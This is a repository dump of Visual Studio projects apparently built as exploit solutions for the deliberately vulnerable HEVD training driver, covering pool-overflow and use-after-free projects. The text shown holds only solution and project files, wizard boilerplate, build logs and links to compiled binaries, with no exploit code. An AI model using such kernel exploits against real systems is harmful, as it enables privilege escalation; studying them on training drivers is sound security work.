20 | 		{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}.Release|x64.ActiveCfg = Release|x64
21 | 		{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}.Release|x64.Build.0 = Release|x64
22 | 		{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}.Release|x86.ActiveCfg = Release|Win32
23 | 		{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/HEVD-Pool-Overflow.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|Win32|C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD-Pool-Overflow\|
3 | 


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Poo.91D3A0DB.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.log:
--------------------------------------------------------------------------------
1 |   HEVD-Pool-Overflow.cpp
2 |   HEVD-Pool-Overflow.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD-Pool-Overflow\Debug\HEVD-Pool-Overflow.exe
3 |   HEVD-Pool-Overflow.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD-Pool-Overflow\Debug\HEVD-Pool-Overflow.pdb (Partial PDB)
4 | 


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.obj


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.pch


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/hevd-pool-overflow.obj.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/hevd-pool-overflow.obj.enc


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/stdafx.obj


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/vc141.idb


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/HEVD-Pool-Overflow/Debug/vc141.pdb


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/HEVD-Pool-Overflow.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>HEVDPoolOverflow</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>Use</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |     </Link>
 95 |   </ItemDefinitionGroup>
 96 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 97 |     <ClCompile>
 98 |       <PrecompiledHeader>Use</PrecompiledHeader>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <Optimization>Disabled</Optimization>
101 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
102 |     </ClCompile>
103 |     <Link>
104 |       <SubSystem>Console</SubSystem>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |     </ClCompile>
116 |     <Link>
117 |       <SubSystem>Console</SubSystem>
118 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
119 |       <OptimizeReferences>true</OptimizeReferences>
120 |     </Link>
121 |   </ItemDefinitionGroup>
122 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
123 |     <ClCompile>
124 |       <WarningLevel>Level3</WarningLevel>
125 |       <PrecompiledHeader>Use</PrecompiledHeader>
126 |       <Optimization>MaxSpeed</Optimization>
127 |       <FunctionLevelLinking>true</FunctionLevelLinking>
128 |       <IntrinsicFunctions>true</IntrinsicFunctions>
129 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Console</SubSystem>
133 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
134 |       <OptimizeReferences>true</OptimizeReferences>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemGroup>
138 |     <Text Include="ReadMe.txt" />
139 |   </ItemGroup>
140 |   <ItemGroup>
141 |     <ClInclude Include="stdafx.h" />
142 |     <ClInclude Include="targetver.h" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="HEVD-Pool-Overflow.cpp" />
146 |     <ClCompile Include="stdafx.cpp">
147 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
148 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
150 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
151 |     </ClCompile>
152 |   </ItemGroup>
153 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
154 |   <ImportGroup Label="ExtensionTargets">
155 |   </ImportGroup>
156 | </Project>


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/HEVD-Pool-Overflow.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="HEVD-Pool-Overflow.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : HEVD-Pool-Overflow Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this HEVD-Pool-Overflow application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your HEVD-Pool-Overflow application.
 9 | 
10 | 
11 | HEVD-Pool-Overflow.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | HEVD-Pool-Overflow.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | HEVD-Pool-Overflow.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named HEVD-Pool-Overflow.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // HEVD-Pool-Overflow.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.exe


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.ilk


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.pdb


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26430.15
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HEVD-UaF-Exploit", "HEVD-UaF-Exploit\HEVD-UaF-Exploit.vcxproj", "{2758AB0C-303D-4E4C-B316-E1FA321E93E2}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{2758AB0C-303D-4E4C-B316-E1FA321E93E2}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{2758AB0C-303D-4E4C-B316-E1FA321E93E2}.Debug|x64.Build.0 = Debug|x64
18 | 		{2758AB0C-303D-4E4C-B316-E1FA321E93E2}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{2758AB0C-303D-4E4C-B316-E1FA321E93E2}.Debug|x86.Build.0 = Debug|Win32
20 | 		{2758AB0C-303D-4E4C-B316-E1FA321E93E2}.Release|x64.ActiveCfg = Release|x64
21 | 		{2758AB0C-303D-4E4C-B316-E1FA321E93E2}.Release|x64.Build.0 = Release|x64
22 | 		{2758AB0C-303D-4E4C-B316-E1FA321E93E2}.Release|x86.ActiveCfg = Release|Win32
23 | 		{2758AB0C-303D-4E4C-B316-E1FA321E93E2}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.log:
--------------------------------------------------------------------------------
1 |   HEVD-UaF-Exploit.cpp
2 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-uaf-exploit\hevd-uaf-exploit\hevd-uaf-exploit.cpp(178): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'HANDLE'
3 |   HEVD-UaF-Exploit.vcxproj -> C:\Users\gwilcox\documents\visual studio 2017\Projects\HEVD-UaF-Exploit\Debug\HEVD-UaF-Exploit.exe
4 |   HEVD-UaF-Exploit.vcxproj -> C:\Users\gwilcox\documents\visual studio 2017\Projects\HEVD-UaF-Exploit\Debug\HEVD-UaF-Exploit.pdb (Partial PDB)
5 | 


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.obj


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.pch


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/HEVD-UaF-Exploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|Win32|C:\Users\gwilcox\documents\visual studio 2017\Projects\HEVD-UaF-Exploit\|
3 | 


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/HEVD-UaF-Exploit.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/stdafx.obj


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/vc141.idb


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-UaF-Exploit/HEVD-UaF-Exploit/Debug/vc141.pdb


--------------------------------------------------------------------------------
/HEVD-UaF-Exploit/HEVD-UaF-Exploit/HEVD-UaF-Exploit.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
